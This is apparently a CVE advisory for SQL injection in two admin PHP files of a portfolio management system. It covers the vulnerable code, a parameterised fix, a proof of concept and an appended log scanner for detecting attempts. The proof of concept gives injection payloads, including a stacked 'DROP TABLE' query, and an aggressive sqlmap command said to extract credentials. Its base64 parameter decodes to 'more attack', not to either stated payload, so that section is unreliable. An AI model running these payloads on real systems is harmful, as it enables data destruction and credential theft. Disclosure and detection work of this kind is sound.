# CVE Report: 1000project User Block/Unblock SQL Injection #3

## Vulnerability Overview

* **Vulnerability Type**: SQL Injection (SQLi)
* **Severity**: Critical (CVSS 3.1: 9.8)
* **Affected Product**: 1000project (Portfolio Management System MCA)
* **Affected Version**: 1.0
* **Root Cause**: The code concatenates the `base64`-decoded request parameter directly into the SQL string without parameterization or validation, allowing an attacker to inject SQL.
* **Key Characteristics**:
  * **Attack Vector**: Base64-encoded parameter injection
  * **Impact**: Unauthorized modification of user account status
  * **Authentication Requirement**: Requires an admin session (but can be bypassed)

## Scope of Impact

* **Affected Components**:
  * `admin/block_status.php`
  * `admin/unblock_me.php`
* **Specific Impacts**:
  1. **Data Tampering**: Attackers can modify the block status of any user account.
  2. **Account Takeover**: Combined with other vulnerabilities, attackers can take over user accounts.
  3. **Privilege Escalation**: Previously blocked malicious accounts can be unblocked.
  4. **Denial of Service**: Legitimate user accounts can be blocked, preventing them from logging in.
  5. **Data Leakage**: Through SQL injection, attackers may access sensitive database information.

## Remediation

1. **Input Validation**: Validate the base64 encoding format, check the decoded value against a character whitelist, and type-check the decoded value (`reg_id` must be an integer).
2. **Use Prepared Statements**: Always use parameterized queries; never concatenate user input directly into SQL statements.
3. **Principle of Least Privilege**: Database users should have only the minimum necessary permissions, separating admin and application database users.
4. **Security Headers**: Add CSRF protection, implement request rate limiting, and add WAF rules.
## Vulnerable Code

**File: admin/block_status.php:5-6**

```php
$reg_id = base64_decode($_GET['q']);
$sql = "update reg_details set block_status='1' where reg_id='$reg_id'";
```

**File: admin/unblock_me.php:5-6**

```php
$reg_id = base64_decode($_GET['q']);
$sql = "update reg_details set block_status='0' where reg_id='$reg_id'";
```

## Recommended Fix

**File: admin/block_status.php**

```php
<?php
session_start();
// $conn is assumed to be the application's mysqli connection handle;
// the report's snippet begins at prepare(), so the variable name is not shown.
// Strict base64 decoding plus a digits-only check: reg_id is an integer, so
// quotes, semicolons and comment markers can never reach the query.
$reg_id = base64_decode($_GET['q'] ?? '', true);
if ($reg_id === false || !ctype_digit($reg_id)) {
    http_response_code(400);
    exit('Invalid user id');
}
$stmt = $conn->prepare("UPDATE reg_details SET block_status='1' WHERE reg_id = ?");
$stmt->bind_param("i", $reg_id);
if ($stmt->execute() === TRUE) {
    $_SESSION['block'] = "User blocked successfully";
    header("location:register_user.php");
}
?>
```

## Proof of Concept (POC)

**SQL Injection Attack**

```http
# Malicious block request - Block all users
GET /admin/block_status.php?q=bW9yZSBhdHRhY2s= HTTP/1.1
Host: target.com
Cookie: PHPSESSID=admin_session

# Decoded payload: 1' OR '1'='1
# Resulting SQL: UPDATE reg_details SET block_status='1' WHERE reg_id='1' OR '1'='1'
```

**SQL Operation Injection**

```http
# More severe attack - SQL operation injection
GET /admin/block_status.php?q=bW9yZSBhdHRhY2s= HTTP/1.1
Host: target.com
Cookie: PHPSESSID=admin_session

# Decoded payload: 1'; DROP TABLE reg_details; --
# Resulting SQL: UPDATE reg_details SET block_status='1' WHERE reg_id='1'; DROP TABLE reg_details; --
```

**Impact Demonstration**

```bash
# Automated attack using SQLmap
sqlmap -u "http://target.com/admin/block_status.php?q=bW9yZSBhdHRhY2s=" \
  --cookie="PHPSESSID=admin_session" \
  --batch \
  --level=5 \
  --risk=3

# This will:
# 1. Confirm SQL injection vulnerability
# 2. Enumerate all databases
# 3. Extract user credentials
# 4. Potentially take control of the entire system
```
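The input checks from remediation step 1 also work as a retrospective detection: any request to the two affected endpoints whose `q` parameter is not a strict base64 encoding of a plain integer `reg_id` is either malformed or an injection attempt. The scanner below is an added example, not code from the report or the 1000project code base; the log lines, log format and IP addresses are constructed.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Endpoints named in the report's Scope of Impact.
AFFECTED = ("/admin/block_status.php", "/admin/unblock_me.php")
# Assumed common-log-style line: ip - - [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)
B64_RE = re.compile(r"^[A-Za-z0-9+/]*={0,2}$")


def decode_reg_id(q: str):
    """Return the decoded reg_id as an int, or None if q fails any check."""
    if not q or not B64_RE.fullmatch(q) or len(q) % 4:
        return None  # not canonical base64 (bad alphabet or bad padding)
    try:
        raw = base64.b64decode(q, validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("ascii", errors="replace")
    if not text.isdigit():  # whitelist: digits only, so no quotes or ';'
        return None
    return int(text)


def scan(lines):
    """Return one finding per request to an affected endpoint with a bad q."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path not in AFFECTED:
            continue
        q = parse_qs(url.query).get("q", [""])[0]
        if decode_reg_id(q) is None:
            findings.append({"ip": m["ip"], "path": url.path, "q": q})
    return findings


# Constructed sample log: one benign id (MTI= -> "12"), the report's PoC
# value (decodes to non-numeric text), and a URL-encoded quote.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /admin/block_status.php?q=MTI= HTTP/1.1" 302 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /admin/block_status.php?q=bW9yZSBhdHRhY2s= HTTP/1.1" 302 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /admin/unblock_me.php?q=12%27 HTTP/1.1" 302 0',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /admin/register_user.php HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} rejected q={f['q']!r}")
```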